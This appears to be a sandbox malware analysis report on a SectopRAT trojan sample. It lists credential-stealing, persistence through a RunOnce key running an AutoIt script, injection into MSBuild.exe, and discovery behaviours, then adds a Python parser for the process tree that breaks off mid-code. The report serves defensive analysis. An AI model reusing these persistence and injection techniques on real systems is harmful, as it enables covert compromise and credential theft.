Malware Analysis Report

2024-12-08 01:27

Sample ID 240904-yy8prawhje
Target aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe
SHA256 aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a
Tags
sectoprat credential_access discovery evasion execution persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a

Threat Level: Known bad

The file aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe was found to be: Known bad.

Malicious Activity Summary

sectoprat credential_access discovery evasion execution persistence rat stealer trojan

SectopRAT payload

SectopRAT

Credentials from Password Stores: Credentials from Web Browsers

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Sets file to hidden

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Adds Run key to start application

Enumerates processes with tasklist

Suspicious use of SetThreadContext

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Runs ping.exe

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-04 20:12

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-04 20:12

Reported

2024-09-04 20:15

Platform

win11-20240802-en

Max time kernel

147s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe"

Signatures

SectopRAT

trojan rat sectoprat

SectopRAT payload

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Downloads MZ/PE file

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-4272559161-3282441186-401869126-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\abbkkce = "\"C:\\eegeaeg\\AutoIt3.exe\" C:\\eegeaeg\\abbkkce.a3x" | C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe | N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2404 set thread context of 3800 | N/A | C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\acetiam\AutoIt3.exe | N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 2588 wrote to memory of 3748 N/A C:\Users\Admin\AppData\Local\Temp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.exe C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp
PID 3748 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2844 wrote to memory of 224 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2844 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2844 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 3748 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\is-UEAQJ.tmp\aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a.tmp C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 568 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3036 wrote to memory of 492 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 492 wrote to memory of 3252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 492 wrote to memory of 3252 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tar.exe
PID 3036 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 4892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 3036 wrote to memory of 2720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2720 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\231.exe C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 2104 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3136 wrote to memory of 1940 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1272 wrote to memory of 3964 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 2104 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\msdtadmin\231\jre\bin\javaw.exe C:\Windows\SysWOW64\explorer.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3240 wrote to memory of 3252 N/A C:\Windows\explorer.exe C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3252 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4948 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\is-SAOAD.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 4504 wrote to memory of 3220 N/A C:\Users\Admin\AppData\Local\Temp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.exe C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp
PID 3220 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 3220 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2676 wrote to memory of 2576 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 2676 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 2676 wrote to memory of 996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 3220 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 3220 wrote to memory of 568 N/A C:\Users\Admin\AppData\Local\Temp\is-UB4L5.tmp\NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc.tmp C:\Windows\system32\cmd.exe
PID 568 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 568 wrote to memory of 1304 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
PID 568 wrote to memory of 2984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\find.exe
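
The memory-write rows above, together with the single row under "Suspicious use of SetThreadContext", flatten the process tree of this run into parent/child pairs. Two things make them awkward to read by hand: the sandbox prints one row per write, so most pairs appear two or three times, and Windows recycled PIDs during the run (568 is attrib.exe under cmd.exe 3036 and later cmd.exe under the second installer's .tmp; 3252 is tar.exe and later the second installer itself). The Python below is an added example by the editor, not sandbox output: it parses rows in exactly the form printed above, identifies a process by (PID, image path) so recycled PIDs stay separate, rebuilds the tree, and marks the AutoIt3.exe to MSBuild.exe thread-context edge as an injection. The row subset and the name abbreviations (T, W, S, Z) are constructed for the example from the rows on this page.

```python
"""Rebuild the behavioral2 process tree from "wrote to memory of" / "set thread context of"
rows (added example, not sandbox output)."""
import re

# Constructed input: a subset of the rows from the two tables above, with the long names
# factored out; rows the report repeats (one per write) are repeated here on purpose.
NAMES = {"T": r"C:\Users\Admin\AppData\Local\Temp", "W": r"C:\Windows",
         "S": "aebfc3d84cf3a4e825aea9e2ea1853e622142223d3b4d66dcd6b753ddce1244a",
         "Z": "NzkzZTQ5NzEzNWI4YTU1NzIyZjNkZTkzYzRjYWM1Mjc"}
REPORT_ROWS = [r.format(**NAMES) for r in [
    r"PID 2588 wrote to memory of 3748 N/A {T}\{S}.exe {T}\is-UEAQJ.tmp\{S}.tmp",
    r"PID 2588 wrote to memory of 3748 N/A {T}\{S}.exe {T}\is-UEAQJ.tmp\{S}.tmp",
    r"PID 3748 wrote to memory of 2844 N/A {T}\is-UEAQJ.tmp\{S}.tmp {W}\system32\cmd.exe",
    r"PID 2844 wrote to memory of 224 N/A {W}\system32\cmd.exe {W}\System32\Wbem\WMIC.exe",
    r"PID 3748 wrote to memory of 3036 N/A {T}\is-UEAQJ.tmp\{S}.tmp {W}\system32\cmd.exe",
    r"PID 3036 wrote to memory of 568 N/A {W}\system32\cmd.exe {W}\system32\attrib.exe",
    r"PID 3036 wrote to memory of 492 N/A {W}\system32\cmd.exe {W}\system32\cmd.exe",
    r"PID 492 wrote to memory of 3252 N/A {W}\system32\cmd.exe {W}\system32\tar.exe",
    r"PID 3036 wrote to memory of 2720 N/A {W}\system32\cmd.exe {T}\msdtadmin\231\231.exe",
    r"PID 2720 wrote to memory of 2104 N/A {T}\msdtadmin\231\231.exe {T}\msdtadmin\231\jre\bin\javaw.exe",
    r"PID 2104 wrote to memory of 3136 N/A {T}\msdtadmin\231\jre\bin\javaw.exe {W}\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe",
    r"PID 3136 wrote to memory of 1940 N/A {W}\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe {W}\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    r"PID 2104 wrote to memory of 4116 N/A {T}\msdtadmin\231\jre\bin\javaw.exe {W}\SysWOW64\explorer.exe",
    r"PID 3240 wrote to memory of 3252 N/A {W}\explorer.exe {T}\{Z}.exe",
    r"PID 3252 wrote to memory of 4948 N/A {T}\{Z}.exe {T}\is-SAOAD.tmp\{Z}.tmp",
    r"PID 4948 wrote to memory of 4504 N/A {T}\is-SAOAD.tmp\{Z}.tmp {T}\{Z}.exe",
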